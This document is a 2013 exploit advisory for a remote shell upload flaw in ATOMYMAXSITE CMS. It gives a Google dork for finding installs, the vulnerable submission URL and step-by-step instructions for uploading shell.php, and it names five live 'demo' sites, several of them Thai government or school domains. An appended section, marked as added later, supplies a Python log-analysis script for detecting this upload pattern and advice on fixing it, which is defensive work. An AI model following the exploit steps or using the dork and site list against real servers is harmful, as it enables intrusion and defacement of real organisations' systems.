#######################################################
#
# [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability
# [+] Google Dork: "Powered by ATOMYMAXSITE"
# [+] Date: 30/06/2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://board.maxsitepro.com
# [+] Version: All versions [1.50 - 2.5]
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] Exploit:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
#
#######################################################
#
# [+] Proof:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
# [+] Then fill in all the information requested
# [+] Now click the Browse button in front of ผลงานฉบับเต็ม(Fultext) and select shell.php
# [+] Now click the button below the form to register the entry
# [+] http://localhost/[path]/index.php?name=research
# [+] Now select the first record and click (FullText)
# [+] (FullText) = path to shell.php
#
#######################################################
#
# [+] Demo site:
#
# [+] http://plan.chon1.go.th
# [+] http://tbacud.ac.th
# [+] http://www.nitedcpm1.net
# [+] http://ict.chon1.go.th/home/
# [+] http://www.chiangdaocity.go.th/home
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313
# [+] Home : http://www.idc-team.net
#
#######################################################
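
Detection logic for the upload flow described above, added here as an example and not part of the original advisory: it flags POSTs to the `research_add` form and later requests for server-side script files by the same client. The log format, the `UPLOAD_DIR` placeholder (the advisory does not name the storage directory) and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (common log format). IPs are documentation ranges and
# UPLOAD_DIR is a placeholder: the advisory does not name the storage directory.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jun/2013:10:01:02 +0700] "GET /index.php?name=research&file=add&op=research_add HTTP/1.1" 200 5120
203.0.113.7 - - [30/Jun/2013:10:02:10 +0700] "POST /index.php?name=research&file=add&op=research_add HTTP/1.1" 200 812
203.0.113.7 - - [30/Jun/2013:10:02:30 +0700] "GET /index.php?name=research HTTP/1.1" 200 4410
203.0.113.7 - - [30/Jun/2013:10:02:40 +0700] "GET /UPLOAD_DIR/shell.php HTTP/1.1" 200 40
198.51.100.4 - - [30/Jun/2013:10:03:00 +0700] "GET /UPLOAD_DIR/report.pdf HTTP/1.1" 200 90211
192.0.2.50 - - [30/Jun/2013:10:05:00 +0700] "POST /cms/index.php?op=research_add&name=research&file=add HTTP/1.1" 302 0
192.0.2.50 - - [30/Jun/2013:10:05:09 +0700] "GET /cms/UPLOAD_DIR/x.phtml HTTP/1.1" 404 210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|pht)$', re.I)
UPLOAD_QUERY = {"name": "research", "file": "add", "op": "research_add"}

def is_research_upload(method, target):
    """True for a POST to the research submission form named in the advisory."""
    if method != "POST":
        return False
    query = parse_qs(urlsplit(target).query)  # parameter order does not matter
    return all(query.get(k, [""])[0] == v for k, v in UPLOAD_QUERY.items())

def find_suspicious(log_text):
    """Return (uploads, script_hits): form POSTs, then script requests by the same client."""
    uploaders, uploads, script_hits = set(), [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, method, target, status = m.groups()
        path = urlsplit(target).path
        if is_research_upload(method, target):
            uploaders.add(ip)
            uploads.append((ip, target))
        elif ip in uploaders and SCRIPT_EXT.search(path) and not path.endswith("/index.php"):
            script_hits.append((ip, path, int(status)))
    return uploads, script_hits

if __name__ == "__main__":
    uploads, hits = find_suspicious(SAMPLE_LOG)
    for ip, target in uploads:
        print("upload form POST:", ip, target)
    for ip, path, status in hits:
        print("script request after upload:", ip, path, status)
```

A script hit with status 200 means a script file was served to a client that had just submitted the form. The server-side fix is to restrict the Fulltext field to document types and to disable script execution in the directory where the form stores files.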